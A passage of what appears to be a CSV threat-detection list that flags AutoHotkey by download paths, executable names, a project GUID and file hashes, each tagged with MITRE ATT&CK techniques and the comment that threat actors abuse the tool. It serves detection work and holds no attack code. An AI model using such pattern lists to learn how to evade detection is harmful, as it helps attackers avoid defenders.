"*/AutoHotkey/releases/download/*",".{0,1000}\/AutoHotkey\/releases\/download\/.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*/AutoHotkey_*.zip*",".{0,1000}\/AutoHotkey_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*/AutoHotkey64.exe*",".{0,1000}\/AutoHotkey64\.exe.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*\AutoHotkey.dll*",".{0,1000}\\AutoHotkey\.dll.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*\AutoHotkey.exe*",".{0,1000}\\AutoHotkey\.exe.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - 
macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*\AutoHotkey_*.zip*",".{0,1000}\\AutoHotkey_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*\AutoHotkey64.exe*",".{0,1000}\\AutoHotkey64\.exe.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*\AutoHotkey-main*",".{0,1000}\\AutoHotkey\-main.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives 
expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*\AutoHotkeyx.sln*",".{0,1000}\\AutoHotkeyx\.sln.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*04eb8295af197da058cec5a2b78b8b7f6bcee7299cbadebf68dc6837968c5bb0*",".{0,1000}04eb8295af197da058cec5a2b78b8b7f6bcee7299cbadebf68dc6837968c5bb0.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*0759be5242a162707b9738226af1a163a15fc6e0105dd88765a52e056ac136c4*",".{0,1000}0759be5242a162707b9738226af1a163a15fc6e0105dd88765a52e056ac136c4.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*0c9f95a64d12580994ffbdd1ba90e8e020a97056d06615c3e6ced6001a7beea4*",".{0,1000}0c9f95a64d12580994ffbdd1ba90e8e020a97056d06615c3e6ced6001a7beea4.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*0d0811072bcce0b852fe3b5da38b12fdbc8e91a419df88c0ff6b09ba0fcb4ca4*",".{0,1000}0d0811072bcce0b852fe3b5da38b12fdbc8e91a419df88c0ff6b09ba0fcb4ca4.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*107fd4550d60e934e88f65b15a00c8eca224f279ed593288d5ad9743ef7f35a4*",".{0,1000}107fd4550d60e934e88f65b15a00c8eca224f279ed593288d5ad9743ef7f35a4.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*15285219ad07eaa012de59c3001b67f65fd7382d913fde559219ab1f180d6fcc*",".{0,1000}15285219ad07eaa012de59c3001b67f65fd7382d913fde559219ab1f180d6fcc.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*1578e1c16807f4f9c02cf9d284cf774ad4725b55f114dae0778a2f29ff9e2c47*",".{0,1000}1578e1c16807f4f9c02cf9d284cf774ad4725b55f114dae0778a2f29ff9e2c47.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*16089612f48695d4bb779fc1eb56596d264a54443ba461e8b9c4df9afa7cbcab*",".{0,1000}16089612f48695d4bb779fc1eb56596d264a54443ba461e8b9c4df9afa7cbcab.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*178f4b8888441e6970682416279fb99a5ffb2844136440becd66a8c62091e435*",".{0,1000}178f4b8888441e6970682416279fb99a5ffb2844136440becd66a8c62091e435.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*1c8697533f19519535ac3679b54beb9632476b3f13adf0d58708b6c4db55e310*",".{0,1000}1c8697533f19519535ac3679b54beb9632476b3f13adf0d58708b6c4db55e310.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*1d9e35fcbf660435ec27cf36a00e87d80928f36e8edb2d7728abaa00585dac08*",".{0,1000}1d9e35fcbf660435ec27cf36a00e87d80928f36e8edb2d7728abaa00585dac08.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*207fea03708f1ba8c8e61f30170d799495736726d1853d7d4150a5ffffa14013*",".{0,1000}207fea03708f1ba8c8e61f30170d799495736726d1853d7d4150a5ffffa14013.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*20878974725227ec21e88d6e91c9ed2615981faa9ab9ee9821268008fd0cb1c7*",".{0,1000}20878974725227ec21e88d6e91c9ed2615981faa9ab9ee9821268008fd0cb1c7.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*20d41f5fcfa4f3d61c533a9e21a019f0bca0bd8012a6528ccdf2621749a122ab*",".{0,1000}20d41f5fcfa4f3d61c533a9e21a019f0bca0bd8012a6528ccdf2621749a122ab.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*24351cf8346262f0dcb4bab290b55ee65de503921906f13dfd106ef259d5fb7f*",".{0,1000}24351cf8346262f0dcb4bab290b55ee65de503921906f13dfd106ef259d5fb7f.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*25ce0fa078c6603a909bb391c1cb4eb891554b29ad275beea47042962576f4ff*",".{0,1000}25ce0fa078c6603a909bb391c1cb4eb891554b29ad275beea47042962576f4ff.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*2afc21c42cca8caf03b00e22e95592ff6cbeb6ef64bd816eb9d32ed260818cb6*",".{0,1000}2afc21c42cca8caf03b00e22e95592ff6cbeb6ef64bd816eb9d32ed260818cb6.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*2c5626009786be43363b7ab1c2cca6a7b0eb57bdf6c40464f2abe874341b0485*",".{0,1000}2c5626009786be43363b7ab1c2cca6a7b0eb57bdf6c40464f2abe874341b0485.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*2cd1b00947abe2df2cba3997d7bdd5a9043ebe598987f0e9cade0aceb73f9edd*",".{0,1000}2cd1b00947abe2df2cba3997d7bdd5a9043ebe598987f0e9cade0aceb73f9edd.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*2df6d9782b8656772c842c22b6582ee91782bde800f345491a71eb72c294e6fc*",".{0,1000}2df6d9782b8656772c842c22b6582ee91782bde800f345491a71eb72c294e6fc.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*2e57c62a9fe28ddf0a4da23123c2622652dde869c366f6f1da6ff8bf78dd50c7*",".{0,1000}2e57c62a9fe28ddf0a4da23123c2622652dde869c366f6f1da6ff8bf78dd50c7.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*2e980bd99add2b0859b0bd6586dddcd688e1f8588ef6c9bf5922674e947a6dc6*",".{0,1000}2e980bd99add2b0859b0bd6586dddcd688e1f8588ef6c9bf5922674e947a6dc6.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*2f58a372dc62e70149bd29621cb76049c438204127426299b9a8bdcff002c23a*",".{0,1000}2f58a372dc62e70149bd29621cb76049c438204127426299b9a8bdcff002c23a.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*314215d36ba200db6ce4ea71ff15203b3b048203621329269801c6c27042ba7c*",".{0,1000}314215d36ba200db6ce4ea71ff15203b3b048203621329269801c6c27042ba7c.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*31bd31d107caf59b48fcdc9af0f428d80aafb0e1a7166b32aa047b3b495d8457*",".{0,1000}31bd31d107caf59b48fcdc9af0f428d80aafb0e1a7166b32aa047b3b495d8457.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*3225d34d16ecfb04fca67e9ed68230ebcbe65bafe70b12ca0c687a039ebe0851*",".{0,1000}3225d34d16ecfb04fca67e9ed68230ebcbe65bafe70b12ca0c687a039ebe0851.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*36d16c928a88a7a600fb6d3599f13e1b601c79b0eafd7cb1e2dde43d42893d0f*",".{0,1000}36d16c928a88a7a600fb6d3599f13e1b601c79b0eafd7cb1e2dde43d42893d0f.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*38b5790e1fd1bea17231a3a55e701217ebde42428046e029f609b1d1734c7140*",".{0,1000}38b5790e1fd1bea17231a3a55e701217ebde42428046e029f609b1d1734c7140.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*38c646e446ecfec33fded951544ee72eab17433e43c997e9c56bd7ccf1d7aaa4*",".{0,1000}38c646e446ecfec33fded951544ee72eab17433e43c997e9c56bd7ccf1d7aaa4.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*39037993-9571-4DF2-8E39-CD2909043574*",".{0,1000}39037993\-9571\-4DF2\-8E39\-CD2909043574.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#GUIDproject","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*3a2f34f529cd12950c905d2c68637bb071a12ebd0c00dd887d807fe6c23de762*",".{0,1000}3a2f34f529cd12950c905d2c68637bb071a12ebd0c00dd887d807fe6c23de762.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for 
Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*3d064459b1bd3505d03217197c2dfa4db9efc0e9f71e6caaf1706ab8697b9a03*",".{0,1000}3d064459b1bd3505d03217197c2dfa4db9efc0e9f71e6caaf1706ab8697b9a03.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*3eb961a803189e9d9d3195464a55acf9eebcd5f626c7e176c906b9639f43169e*",".{0,1000}3eb961a803189e9d9d3195464a55acf9eebcd5f626c7e176c906b9639f43169e.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*3f1b1ca2800dbae254969ed5365848e4fbcf8725ec68d265c40318fe7e3d51a3*",".{0,1000}3f1b1ca2800dbae254969ed5365848e4fbcf8725ec68d265c40318fe7e3d51a3.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*3ff847c73e2ab0d5f1f1440046cd001d25639793a352d9558b24708d77ac3127*",".{0,1000}3ff847c73e2ab0d5f1f1440046cd001d25639793a352d9558b24708d77ac3127.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for 
Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*411ea6ded074b7a3e461672d528e2a8e80bddcbaddcba7a2addbc4399e44d140*",".{0,1000}411ea6ded074b7a3e461672d528e2a8e80bddcbaddcba7a2addbc4399e44d140.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*487413ff39c7aa044e1b5ab8a0047d6ef7c9c25550fec4d91e8a0a97fd1282ac*",".{0,1000}487413ff39c7aa044e1b5ab8a0047d6ef7c9c25550fec4d91e8a0a97fd1282ac.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*49a48e879f7480238d2fe17520ac19afe83685aac0b886719f9e1eac818b75cc*",".{0,1000}49a48e879f7480238d2fe17520ac19afe83685aac0b886719f9e1eac818b75cc.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*4c517113f22937a313921b73c9b25463cc7ed0b77d9cf42b08b6443184e52e90*",".{0,1000}4c517113f22937a313921b73c9b25463cc7ed0b77d9cf42b08b6443184e52e90.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for 
Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*4de829c7a5e19e8578b398793c952c1ea1a3a1df54f354f46ff140a4932da53f*",".{0,1000}4de829c7a5e19e8578b398793c952c1ea1a3a1df54f354f46ff140a4932da53f.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*4e07de6f89b7dd371735d0360afc61ac21d19ea7c4b3f020e2e1a6b17b61432c*",".{0,1000}4e07de6f89b7dd371735d0360afc61ac21d19ea7c4b3f020e2e1a6b17b61432c.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*4e1e3123dd85d3ac65a0803b08dd89b9b12b5a00b9f566782855332d03e5fe26*",".{0,1000}4e1e3123dd85d3ac65a0803b08dd89b9b12b5a00b9f566782855332d03e5fe26.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*510a833bdd0f896cc398eaae4ff475f5b7cfe37649efbf647b50d21e442394b9*",".{0,1000}510a833bdd0f896cc398eaae4ff475f5b7cfe37649efbf647b50d21e442394b9.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for 
Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*52a8249970f72966d7fae76ffc7fd4009ce4100e92ece3fd6c409c61943af492*",".{0,1000}52a8249970f72966d7fae76ffc7fd4009ce4100e92ece3fd6c409c61943af492.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*5eefcfc824818b2cdefcdf6719f5db13a4800434146f0b90ca3a30e2ad6e737f*",".{0,1000}5eefcfc824818b2cdefcdf6719f5db13a4800434146f0b90ca3a30e2ad6e737f.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*60d86368165d01d88709d304757abcc642b0c165379438023fb3bc791a5b749f*",".{0,1000}60d86368165d01d88709d304757abcc642b0c165379438023fb3bc791a5b749f.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - 